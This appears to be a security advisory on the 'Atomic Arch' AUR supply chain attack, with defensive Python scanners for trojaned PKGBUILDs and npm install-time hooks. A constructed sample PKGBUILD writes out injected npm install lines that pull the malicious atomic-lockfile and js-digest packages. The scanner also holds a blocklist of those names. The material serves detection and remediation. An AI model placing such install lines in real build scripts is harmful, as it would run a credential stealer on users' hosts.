Researchers have disclosed a software supply chain attack, dubbed "Atomic Arch," targeting orphaned packages in the Arch User Repository (AUR). Using newly created AUR accounts, an attacker adopted more than 400 abandoned packages through the legitimate maintainer-handoff mechanism and modified each package's build script (PKGBUILD) so that building and installing the package (for example with makepkg or an AUR helper) runs npm install atomic-lockfile; the packaged software itself was left untouched, so the change is visible only in the PKGBUILD and not in the upstream source. The exact install line varies by package: legitimate packages such as minimist, chalk, axios, got, or yargs share the line as camouflage, and some variants add a second malicious package, js-digest.
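As an added triage check (not code from the advisory, the AUR, or any AUR helper), the following Python script extracts every package name from each npm install line in a PKGBUILD, regardless of which camouflage packages share the line or whether the line is split with backslash continuations, and flags the names the advisory identifies; it also walks a directory tree of cached AUR clones. The sample PKGBUILD is constructed, and the `~/.cache/yay` default path is an assumption about where an AUR helper keeps its clones.

```python
"""Scan PKGBUILD files for npm install lines that pull a blocklisted package.

The injected line hides the malicious package among legitimate ones, so the
check extracts every package argument from every npm install/i/add call,
ignoring flags and non-package arguments, and compares each against a blocklist.
"""
import os
import re
import shlex

# Package names from the advisory; extend as further names are published.
BLOCKLIST = {"atomic-lockfile", "js-digest"}

NPM_INSTALL_RE = re.compile(r"\bnpm\s+(?:install|i|add)\b")
# Valid unscoped or scoped npm package name (after the version spec is removed).
NAME_RE = re.compile(r"^(?:@[a-z0-9~-][a-z0-9._~-]*/)?[a-z0-9~-][a-z0-9._~-]*$")


def _logical_lines(text):
    """Yield (first_line_number, joined_text), joining backslash continuations."""
    buf, start = [], None
    for lineno, line in enumerate(text.splitlines(), 1):
        if start is None:
            start = lineno
        if line.rstrip().endswith("\\"):
            buf.append(line.rstrip()[:-1])
            continue
        buf.append(line)
        yield start, " ".join(buf)
        buf, start = [], None
    if buf:
        yield start, " ".join(buf)


def _package_name(arg):
    """Strip a version/tag spec (pkg@1.2.3, @scope/pkg@^1) down to the bare name."""
    if arg.startswith("@"):
        scope, _, rest = arg[1:].partition("/")
        return "@" + scope + "/" + rest.split("@", 1)[0]
    return arg.split("@", 1)[0]


def find_npm_installs(pkgbuild_text):
    """Return [(line_number, [package names])] for every npm install/i/add call."""
    found = []
    for lineno, line in _logical_lines(pkgbuild_text):
        code = line.split("#", 1)[0]            # drop a trailing shell comment
        for cmd in re.split(r"&&|\|\||;", code):  # one npm call per shell command
            m = NPM_INSTALL_RE.search(cmd)
            if not m:
                continue
            try:
                argv = shlex.split(cmd[m.end():])
            except ValueError:                  # unbalanced quotes: fall back to whitespace
                argv = cmd[m.end():].split()
            names = [_package_name(a) for a in argv if not a.startswith("-")]
            # NAME_RE drops flag values such as "$pkgdir/usr" that are not package names
            found.append((lineno, [n for n in names if NAME_RE.match(n)]))
    return found


def flag_pkgbuild(pkgbuild_text, blocklist=BLOCKLIST):
    """Return sorted (line_number, package) hits against the blocklist."""
    hits = []
    for lineno, pkgs in find_npm_installs(pkgbuild_text):
        hits.extend((lineno, p) for p in pkgs if p in blocklist)
    return sorted(hits)


def scan_tree(root, blocklist=BLOCKLIST):
    """Walk a directory (e.g. an AUR helper's clone cache) and flag every PKGBUILD."""
    results = {}
    for dirpath, _, files in os.walk(root):
        if "PKGBUILD" in files:
            path = os.path.join(dirpath, "PKGBUILD")
            with open(path, encoding="utf-8", errors="replace") as f:
                hits = flag_pkgbuild(f.read(), blocklist)
            if hits:
                results[path] = hits
    return results


# Constructed sample PKGBUILD (not one of the real affected packages): a trojaned
# build() hiding the malicious names among legitimate ones and behind a --prefix value.
SAMPLE_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.0.0
build() {
  cd "$srcdir/$pkgname-$pkgver"
  npm install --no-save minimist chalk \
      atomic-lockfile@1.4.2 yargs   # looks like ordinary dependency setup
  npm install --prefix "$pkgdir/usr" axios && npm i -g js-digest
  make
}
"""

if __name__ == "__main__":
    import sys
    # Assumed default clone cache of the yay AUR helper; pass another root as argv[1].
    root = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/.cache/yay")
    for path, hits in scan_tree(root).items():
        for lineno, pkg in hits:
            print(f"{path}:{lineno}: blocklisted npm package {pkg}")
```

A PKGBUILD that runs npm install at all is worth a second look during review even when no name matches, since the payload package could be renamed; the blocklist catches the known names, the per-line package listing from find_npm_installs supports the manual review.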
The npm package atomic-lockfile is purpose-built malware. It defines an npm preinstall lifecycle hook, which npm runs automatically during npm install, that executes a bundled Linux ELF binary (src/hooks/deps); installing the package is enough to run the payload, without any code ever importing it. The payload is a credential stealer aimed at developer, CI/CD, and build environments: it harvests browser and Electron application data (cookies, Slack, Microsoft Teams, Discord) and developer and cloud secrets, including GitHub tokens, npm tokens, SSH keys, Docker/Podman credentials, and HashiCorp Vault tokens. When executed as root, it deploys an eBPF-based rootkit to hide its processes, files, and sockets, and establishes persistence through systemd service units. Collected data is exfiltrated to the file-sharing service temp.sh, and command and control runs over a Tor onion service (POST /api/agent).
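The following Python audit, added here and not taken from the advisory or from npm, shows how to detect the mechanism itself rather than the specific package name: it reads an unpacked package's package.json, lists the lifecycle scripts npm runs during installation, resolves any package-local files those scripts name, and reports which of them are ELF binaries. The fixture it builds is a constructed stand-in (the script string and the binary contents are assumptions); only the package name, version and hook path src/hooks/deps come from the advisory.

```python
"""Audit an unpacked npm package for install-time lifecycle scripts that launch a
native binary bundled inside the package (a preinstall hook running an ELF file,
as described above). npm runs these scripts for a dependency during `npm install`
unless --ignore-scripts is passed or ignore-scripts=true is set in npm config.
"""
import json
import os
import re
import shlex
import tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall")
ELF_MAGIC = b"\x7fELF"


def is_elf(path):
    """True if the file starts with the ELF magic bytes."""
    try:
        with open(path, "rb") as f:
            return f.read(4) == ELF_MAGIC
    except OSError:
        return False


def _bundled_files(command, base):
    """Yield package-relative paths of existing files under `base` that a script names."""
    for part in re.split(r"&&|\|\||\||;", command):
        try:
            words = shlex.split(part)
        except ValueError:
            words = part.split()
        for w in words:
            candidate = os.path.normpath(os.path.join(base, w))
            # Only files inside the package directory count as "bundled".
            if candidate.startswith(base + os.sep) and os.path.isfile(candidate):
                yield os.path.relpath(candidate, base).replace(os.sep, "/")


def audit_package(pkg_dir):
    """Return one finding per install hook: the command, bundled files it names, ELF ones."""
    base = os.path.abspath(pkg_dir)
    with open(os.path.join(base, "package.json"), encoding="utf-8") as f:
        scripts = json.load(f).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        files = list(_bundled_files(cmd, base))
        elf = [p for p in files if is_elf(os.path.join(base, p))]
        findings.append({"hook": hook, "command": cmd, "files": files, "elf": elf})
    return findings


def build_fixture(root):
    """Write a constructed package layout mirroring the advisory's description.
    The preinstall string and the file contents are assumptions; only the name,
    version and hook path src/hooks/deps are from the advisory."""
    os.makedirs(os.path.join(root, "src", "hooks"))
    with open(os.path.join(root, "src", "hooks", "deps"), "wb") as f:
        f.write(ELF_MAGIC + b"\x02\x01\x01" + bytes(9))  # ELF header prefix only, not runnable
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as f:
        json.dump({"name": "atomic-lockfile", "version": "1.4.2",
                   "scripts": {"preinstall": "./src/hooks/deps", "test": "echo ok"}}, f)
    return root


def demo():
    """Build the constructed fixture in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_package(build_fixture(tmp))


if __name__ == "__main__":
    import sys
    findings = audit_package(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for f in findings:
        kind = "ELF binary" if f["elf"] else "script"
        print(f'{f["hook"]}: {f["command"]!r} runs bundled {kind}: {f["files"]}')
```

Run it against a directory under node_modules, or against a tarball unpacked with npm pack before the package is ever installed. Setting ignore-scripts=true in npm config (or passing --ignore-scripts) stops such hooks from running at all, at the cost of breaking packages that legitimately compile native code at install time; in CI that trade-off usually favours disabling scripts and allowlisting the few packages that need them.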
While the AUR delivery vector affects only Arch Linux users, the malicious package resided on the public npm registry, so exposure is not limited to any one operating system; payload execution, however, is limited to Linux hosts (the payload is a Linux ELF), which matches the cloud build hosts, CI runners, and containers it targets. The official Arch Linux package repositories are not affected. The malicious atomic-lockfile (1.4.2) and js-digest (4.2.2) packages have been removed from the npm registry and the affected AUR packages reverted, closing the window for new infections; the exposure window ran approximately June 10–12, 2026. Any host that installed either package during that window should be treated as compromised: uninstalling the package does not undo an already-executed payload, so the credentials and tokens it targets should be rotated and the host checked for the rootkit and systemd persistence described above, or rebuilt from a known-good image.